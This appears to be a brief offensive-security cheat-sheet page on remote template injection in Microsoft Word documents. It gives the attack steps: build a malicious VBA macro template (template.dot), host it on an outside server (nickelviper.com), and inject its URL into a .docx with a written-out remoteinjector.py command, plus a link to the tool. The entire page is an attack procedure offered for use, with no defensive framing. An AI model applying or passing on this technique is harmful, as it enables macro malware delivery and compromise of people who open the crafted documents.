Create malicious VBA document, save it as .dot (template.dot)
Host .dot file, for example: http://nickelviper.com:80/template.dotarrow-up-right
Create new document and save as .docx file (template.docx)
Inject .docx with remote template
python3 remoteinjector.py -w http://nickelviper.com/template.dot template.docx
https://github.com/JohnWoodman/remoteInjectorarrow-up-right
Last updated 2 years ago